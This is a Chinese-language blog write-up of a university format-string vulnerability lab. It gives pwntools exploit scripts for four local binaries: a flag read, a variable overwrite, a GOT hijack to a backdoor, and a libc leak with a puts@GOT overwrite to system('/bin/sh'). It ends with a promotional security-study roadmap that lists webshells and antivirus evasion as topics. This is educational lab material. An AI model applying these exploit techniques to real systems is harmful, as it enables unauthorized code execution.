ouc 网络安全实验格式化字符串漏洞

程序员小肖

于 2024-08-23 13:50:31 发布

阅读量836

点赞数 8

文章标签： web安全网络安全

本文链接：https://blog.csdn.net/qq_53058639/article/details/141464035

版权

文章目录

```
* 要求
```
- lab1
- lab2
- lab3
- lab4
- 结语

因为当时自己做实验的时候出现了很多疑问不会解决，在网上看到了一位大佬
王森ouc
的专栏文章解决了很多问题，也学到了很多知识和解决问题的方法，现在把我的实验解决方法也发上来，希望有不会的同学可以通过博文理解实验内容，同时能够熟练掌握这些知识。感谢这位大佬和课堂中帮助过我的同学老师。

注意：博文仅供学习参考使用，请勿直接复制粘贴，因个人复制粘贴造成的后果博主一概不负责任。

要求

• 通过 Objdump 或 IDA 逆向找到漏洞
• 通过 GDB 调试，构造完整 payload
• 通过 pwntools 触发漏洞，实现实验目标

lab1

首先查看 IDA 中的反汇编代码。代码大致意思为通过 read_flag()函数从文件“flag.txt”中读取内容，存入变量 flag
中。后面进行输入，通过 printf()输出输入的字符。如果输入的字符存在格式化符号，即可读取内存。

本例的任务是格式化字符串任意读，读取的内容是 flag 文本文件的内容。首先查看文件具体信息，然后获取变量 flag
的地址，通过输入特定字符串确定偏移量，以确定读取地址的时候的偏移量。Payload 里面是前面得到的 flag 的地址，以及格式化字符，用来读flag
地址的内容。

通过 nm 查看 flag 地址，获得 flag 地址“0x0804a034”。
通过输入特定字符串比如 “AAAA.%p.%p.%p.%p.%p.%p.%p.%p.%p”
确定字符串的偏移量。可以看到输入字符串之后，输出的“0x41414141”在偏移量为 11 的地方。在此之前，关闭 Linux 的内存地址随机化。

如图是输入字符串后的堆栈图，输入的 AAAA 如前所说偏移量为 11，则后续的 flag 地址偏移量为 12，用%12$s 即可将该处的内容按地址读取。

在这里插入图片描述

脚本如下：

from pwn import *
p = process('./lab3_1')
flag_addr =0x0804a034
p.recvuntil(b'Give me something...\n') 
payload =p32(flag_addr)+b"%11$s"
p.send(payload) 
print(p.recv())
#p.interactive()

lab2

运行程序时进行输入，程序输出输入的字符串，进行一系列操作，后面将 changethis 与“0xBADF00D”进行比较，如果相同，则
read_flag()，输出 flag。

因为 changethis 要和一个数“0xBADF00D”进行比较，所以要修改changethis 的值为这个数，然后程序进入
read_flag()，输出 flag。

通过 nm 查看 changethis 地址，获得 changethis
地址“0x0804a038”，通过输入特定字符串比如“AAAA”确定字符串的偏移量。可以看到输入字符串“AAAA.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p”之后，输出的“0x41414141”在偏移量为
11 的地方。

构造本例的 payload 可以使用函数 fmtstr_payload()，payload = fmtstr_payload(11,
{0x0804a038: 0xBADF00D})。

构造 payload 也可以手动构造。因为要输入的字符串太多，所以用 hn 输入两个字节。将字符串分成 “0xBAD” 和 “0xF00D”，将其转换为
int 型，“0xBAD” 和 “0xF00D” 分别为 “2989” 和 “61453” 。注意输入构 “0xF00D” 的时候，因为之前构造
“0xBAD” 以及输入了 2989 个字符，而输入的所有字符用来构造 “0xF00D”，所以需要在“61453”的基础上减去 “2989” 得
“58464” 。

脚本如下：

from pwn import *
change_this_addr=0x0804a038
payload = b'%2989c%18$hn'+b'%58464c%19$hn'+b'aaa\x3a\xa0\x04\x08\x38\xa0\x04\x08'
p=process(['./lab3_2',payload])
p.recvuntil(b'\n\n\n-----after------')
print(p.recv())

lab3

运行时输入 buf，程序再输出输入的字符串。

劫持控制流，call _strdup —> _strdup 的 PLT 表 —> _strdup 的got 表，plt 表能从 GOT 表中找到真实的
strdup 函数供程序加载运行。通过输入的 buf 修改 strdup 的 GOT 表，将其修改为one_gadget()函数的地址，当执行 strdup
函数的时候，实际执行的就是后门函数 one_gadget()。本例使用函数 fmtstr_payload()来构造 payload。

通过 nm 查看 one_gadget()函数地址，如图。获得 one_gadget() 函数地址“0x0804852b”。在 IDA 里查看 PLT
表，GOT 表地址,后续要用到的是 GOT 表地址“0x0804a014”。

from pwn import *
p=process('./lab3_3')
return_addr=##你的return地址##
strdup_addr=##你的strdup地址##
p.recv()
payload = fmtstr_payload(11, {strdup_addr:return_addr})
p.sendline(payload)
p.interactive()

lab4

输入用户名，ask_username 将输入的字符串复制到 v4 中，对每个字符加一，ask_password 将修改后的 v4 与 “sysbdmin”
进行比较，不同则退出，相同则继续。因此可得输入的字符串为 “rxraclhm”
。之后输出提示语。可输入的操作共有三种：put（类似新建文件）、get（类似打开文件，查看其内容）、dir（类似查看当前所有文件名）。

① 大致思路：
首先解决如何得到 system 函数的地址的问题。
再解决如何执行 system 函数的问题。
最后解决 system 函数的参数，即“/bin/sh”字符串如何获取的问题。

② 得到 system 函数的地址：
在 IDA 中查看，程序中没有 system 函数。但是 libc.so 文件中有system 函数，因此可以利用程序执行时的动态链接库 libc.so
泄露 system
函数地址。由于函数是动态加载进内存的，代码所在的内存地址不一定相同，但是每个函数的相对地址不变，只是加了一个基址。所以函数本次运行的真正地址 = 基址 +
偏移量。

③ 执行 system 函数：
使用 fmtstr-payload 函数构造 payload，用格式化字符串漏洞修改 show_dir()返回的 puts()函数的 got
表地址，将其修改成system 函数地址，因此执行 puts 函数的时候实际执行的是system 函数。

④ 构造获取权限的 “/bin/sh 字符串”：
puts() 返回的是文件名，system 函数时所用的参数就是文件名，因此可以把文件名写成/bin/sh 来完成调用，一次攻击需要 put
两次文件，可以在最后一次直接使用 ‘/bin/sh;’ 对文件命名。

具体操作：
通过 ldd 查看使用到的动态链接库信息。查看 puts 的 GOT 表地址。

from pwn import *
def put(name,content):
 p.sendline('put')
 p.recvuntil('please enter the name of the file you want to upload:')
 p.sendline(name)
 p.recvuntil('then, enter the content:')
 p.sendline(content)
def get(name):
 p.sendline('get')
 p.recvuntil('enter the file name you want to get:')
 p.sendline(name)
 data=p.recv()
 return data
def show_dir():
 p.sendline('dir')
def password():
 p.recvuntil('Name (ftp.hacker.server:Rainism):')
 p.sendline('rxraclhm')
p = process('./lab3_4')
password()
libc = ELF('##你的动态链接库##')
system_offset=libc.symbols['system']
puts_offset=libc.symbols['puts']
puts_got=##你的puts的got表地址##
put('addr',b'%8$s'+p32(puts_got))
puts_addr=u32(get('addr')[:4])
system_addr = puts_addr - puts_offset + system_offset
payload = fmtstr_payload(7, {puts_got: system_addr})
put('/bin/sh;',payload)
p.recvuntil('ftp>')
get('/bin/sh;')
show_dir()
p.interactive()

结语

这个实验很难，前前后后三周左右才啃下来这个硬骨头，期间和同学以及助教讨论学习了很多，通过这门课确实学到了不少有用的东西，只要认真做实验，对漏洞这方面的理解会很深的。

学习网络安全技术的方法无非三种:

第一种是报网络安全专业，现在叫网络空间安全专业，主要专业课程:程序设计、计算机组成原理原理、数据结构、操作系统原理、数据库系统、计算机网络、人工智能、自然语言处理、社会计算、网络安全法律法规、网络安全、内容安全、数字取证、机器学习，多媒体技术，信息检索、舆情分析等。

第二种是自学，就是在网上找资源、找教程，或者是想办法认识一-些大佬，抱紧大腿，不过这种方法很耗时间，而且学习没有规划，可能很长一段时间感觉自己没有进步，容易劝退。

如果你对网络安全入门感兴趣，那么你需要的话可以点击这里👉网络安全重磅福利：入门&进阶全套282G学习资源包免费分享！

第三种就是去找培训。

接下来，我会教你零基础入门快速入门上手网络安全。

网络安全入门到底是先学编程还是先学计算机基础？这是一个争议比较大的问题，有的人会建议先学编程，而有的人会建议先学计算机基础，其实这都是要学的。而且这些对学习网络安全来说非常重要。但是对于完全零基础的人来说又或者急于转行的人来说，学习编程或者计算机基础对他们来说都有一定的难度，并且花费时间太长。

第一阶段：基础准备 4周~6周

这个阶段是所有准备进入安全行业必学的部分，俗话说：基础不劳，地动山摇

第二阶段：web渗透

学习基础时间：1周 ~ 2周：

① 了解基本概念：（SQL注入、XSS、上传、CSRF、一句话木马、等）为之后的WEB渗透测试打下基础。
② 查看一些论坛的一些Web渗透，学一学案例的思路，每一个站点都不一样，所以思路是主要的。
③ 学会提问的艺术，如果遇到不懂得要善于提问。

配置渗透环境时间：3周 ~ 4周：

① 了解渗透测试常用的工具，例如（AWVS、SQLMAP、NMAP、BURP、中国菜刀等）。
② 下载这些工具无后门版本并且安装到计算机上。
③ 了解这些工具的使用场景，懂得基本的使用，推荐在Google上查找。

渗透实战操作时间：约6周：

① 在网上搜索渗透实战案例，深入了解SQL注入、文件上传、解析漏洞等在实战中的使用。
② 自己搭建漏洞环境测试，推荐DWVA，SQLi-labs，Upload-labs，bWAPP。
③ 懂得渗透测试的阶段，每一个阶段需要做那些动作：例如PTES渗透测试执行标准。
④ 深入研究手工SQL注入，寻找绕过waf的方法，制作自己的脚本。
⑤ 研究文件上传的原理，如何进行截断、双重后缀欺骗(IIS、PHP)、解析漏洞利用（IIS、Nignix、Apache）等，参照：上传攻击框架。
⑥ 了解XSS形成原理和种类，在DWVA中进行实践，使用一个含有XSS漏洞的cms，安装安全狗等进行测试。
⑦ 了解一句话木马，并尝试编写过狗一句话。
⑧ 研究在Windows和Linux下的提升权限，Google关键词：提权

以上就是入门阶段

第三阶段：进阶

已经入门并且找到工作之后又该怎么进阶？详情看下图

给新手小白的入门建议：
新手入门学习最好还是从视频入手进行学习，视频的浅显易懂相比起晦涩的文字而言更容易吸收，这里我给大家准备了一套网络安全从入门到精通的视频学习资料包免费领取哦！

如果你对网络安全入门感兴趣，那么你需要的话可以点击这里👉网络安全重磅福利：入门&进阶全套282G学习资源包免费分享！

接下来我将给各位同学划分一张学习计划表！

学习计划

那么问题又来了，作为萌新小白，我应该先学什么，再学什么？
既然你都问的这么直白了，我就告诉你，零基础应该从什么开始学起：

阶段一：初级网络安全工程师

接下来我将给大家安排一个为期1个月的网络安全初级计划，当你学完后，你基本可以从事一份网络安全相关的工作，比如渗透测试、Web渗透、安全服务、安全分析等岗位；其中，如果你等保模块学的好，还可以从事等保工程师。

综合薪资区间6k~15k

1、网络安全理论知识（2天）
①了解行业相关背景，前景，确定发展方向。
②学习网络安全相关法律法规。
③网络安全运营的概念。
④等保简介、等保规定、流程和规范。（非常重要）

2、渗透测试基础（1周）
①渗透测试的流程、分类、标准
②信息收集技术：主动/被动信息搜集、Nmap工具、Google Hacking
③漏洞扫描、漏洞利用、原理，利用方法、工具（MSF）、绕过IDS和反病毒侦察
④主机攻防演练：MS17-010、MS08-067、MS10-046、MS12-20等

3、操作系统基础（1周）
①Windows系统常见功能和命令
②Kali Linux系统常见功能和命令
③操作系统安全（系统入侵排查/系统加固基础）

4、计算机网络基础（1周）
①计算机网络基础、协议和架构
②网络通信原理、OSI模型、数据转发流程
③常见协议解析（HTTP、TCP/IP、ARP等）
④网络攻击技术与网络安全防御技术
⑤Web漏洞原理与防御：主动/被动攻击、DDOS攻击、CVE漏洞复现

5、数据库基础操作（2天）
①数据库基础
②SQL语言基础
③数据库安全加固

6、Web渗透（1周）
①HTML、CSS和JavaScript简介
②OWASP Top10
③Web漏洞扫描工具
④Web渗透工具：Nmap、BurpSuite、SQLMap、其他（菜刀、漏扫等）

那么，到此为止，已经耗时1个月左右。你已经成功成为了一名“脚本小子”。那么你还想接着往下探索吗？

阶段二：中级or高级网络安全工程师（看自己能力）

综合薪资区间15k~30k

7、脚本编程学习（4周）
在网络安全领域。是否具备编程能力是“脚本小子”和真正网络安全工程师的本质区别。在实际的渗透测试过程中，面对复杂多变的网络环境，当常用工具不能满足实际需求的时候，往往需要对现有工具进行扩展，或者编写符合我们要求的工具、自动化脚本，这个时候就需要具备一定的编程能力。在分秒必争的CTF竞赛中，想要高效地使用自制的脚本工具来实现各种目的，更是需要拥有编程能力。

零基础入门的同学，我建议选择脚本语言Python/PHP/Go/Java中的一种，对常用库进行编程学习
搭建开发环境和选择IDE，PHP环境推荐Wamp和XAMPP，IDE强烈推荐Sublime；

Python编程学习，学习内容包含：语法、正则、文件、网络、多线程等常用库，推荐《Python核心编程》，没必要看完

用Python编写漏洞的exp,然后写一个简单的网络爬虫

PHP基本语法学习并书写一个简单的博客系统

熟悉MVC架构，并试着学习一个PHP框架或者Python框架 (可选)

了解Bootstrap的布局或者CSS。